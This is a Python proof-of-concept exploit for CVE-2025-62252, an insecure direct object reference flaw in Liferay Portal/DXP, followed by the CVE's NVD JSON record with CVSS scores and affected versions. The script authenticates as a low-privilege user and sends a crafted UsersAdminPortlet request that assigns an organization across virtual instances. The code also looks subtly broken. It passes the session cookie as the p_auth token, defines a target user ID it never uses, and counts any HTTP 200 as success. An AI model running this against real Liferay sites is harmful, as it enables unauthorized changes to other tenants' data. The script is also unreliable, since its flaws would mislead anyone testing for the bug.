CVE-2025-62252

# CVE-2025-62252 - Liferay Portal/DXP IDOR Vulnerability PoC # This PoC demonstrates how an authenticated user in one virtual instance # can assign an organization from a different virtual instance to a user. import requests # Target Liferay Portal instance TARGET_URL = "https://target-liferay-instance.com" # Attacker credentials (low-privilege user in Virtual Instance A) ATTACKER_USER = "attacker_user" ATTACKER_PASS = "attacker_password" # Target user ID in Virtual Instance A TARGET_USER_ID = "12345" # Organization ID from Virtual Instance B (different virtual instance) CROSS_INSTANCE_ORG_ID = "67890" # Step 1: Authenticate as the attacker session = requests.Session() login_url = f"{TARGET_URL}/c/portal/login" login_data = { "_com_liferay_login_web_portlet_LoginPortlet_login": ATTACKER_USER, "_com_liferay_login_web_portlet_LoginPortlet_password": ATTACKER_PASS, } session.post(login_url, data=login_data) # Step 2: Exploit the IDOR vulnerability via UsersAdminPortlet # The vulnerable parameter is _com_liferay_users_admin_web_portlet_UsersAdminPortlet_addUserIds exploit_url = f"{TARGET_URL}/group/control_panel/manage?p_p_id=com_liferay_users_admin_web_portlet_UsersAdminPortlet&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view" # Craft the malicious request with cross-virtual-instance organization ID exploit_params = { "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_addUserIds": CROSS_INSTANCE_ORG_ID, "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_cmd": "updateOrganizations", "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_redirect": "", "p_auth": session.cookies.get("JSESSIONID", ""), } # Step 3: Send the exploit request response = session.post(exploit_url, data=exploit_params) if response.status_code == 200: print("[+] IDOR exploit successful - Cross-instance organization assigned!") else: print(f"[-] Exploit failed with status code: {response.status_code}")

{"cve": {"id": "CVE-2025-62252", "sourceIdentifier": "[email protected]", "published": "2025-10-13T21:15:35.410", "lastModified": "2025-12-12T20:35:48.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure Direct Object Reference (IDOR) vulnerability in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.10, 7.4 GA through update 92, and older unsupported versions allows remote authenticated users in one virtual instance to assign an organization to a user in a different virtual instance via the _com_liferay_users_admin_web_portlet_UsersAdminPortlet_addUserIds parameter."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.4", "matchCriteriaId": "5F7BCC0B-5F36-4E6B-AABE-61B88E9A99D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.Q3.1", "versionEndIncluding": "2023.Q3.10", "matchCriteriaId": "DB698493-4763-4E87-9764-BC36906CCF5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1.0", "versionEndExcluding": "7.4.3.112", "matchCriteriaId": "CEA3CAD9-1E84-4DF9-A232-997BA0A2C654"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62252", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}